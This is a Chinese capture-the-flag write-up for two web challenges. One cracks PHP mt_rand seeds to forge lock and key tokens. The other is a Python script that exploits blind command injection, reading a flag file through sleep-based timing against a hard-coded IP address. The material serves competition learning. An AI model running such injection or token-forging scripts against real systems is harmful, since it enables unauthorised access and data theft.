首届“钓鱼城杯”wp

easyseed

访问网址,在cookie中找到lock。扫到目录index.bak

1
2
3
4
5
6
7
8
9
10
11
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}

爆破mt_rand,首先转成php_mt_seed4.0工具可识别的格式:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!coding=utf8

str1='abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
str2='vEUHaY'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
break
print(res)

爆出两个种子;然后本地调成php5.6版本跑脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}

$seed=718225;
//$seed = 4007230629;
mt_srand($seed);
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1234567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
echo $lock;
echo "<hr>";
echo $key;

得到key后放到cookie中提交还是不对,赛后看到一篇wp说要放xff,,,,,

easyweb

进去是apache默认页面,扫目录也没有发现;在header中发现Post:cmd,但执行命令发现无回显,使用cmd=sleep 2命令发现有延迟,那么猜到是无回显命令执行,写脚本跑即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#coding:utf-8
import requests

payloads = "QWERTYUIIOPASDFGHJKLZXCVBNM1234567890="

def post_request(url, data, timeout=2):
try:
res = requests.post(url, data=data,timeout = timeout)
except Exception as e:
#print(e)
return True


def get_content(url, length, timeout=2):
content = ''
for i in range(1, int(length)+1):
print('[+]length: ', i)
for payload in payloads:
data = {
'cmd':'if [ $(cat /f*|base32|cut -c {}) = {} ];then sleep 2;fi'.format(i, payload)
}
#print(data)
if post_request(url, data):
content += payload
print(content)
break
return content


if __name__ == '__main__':
url = 'http://119.3.37.185/index.php'
get_content(url, 50)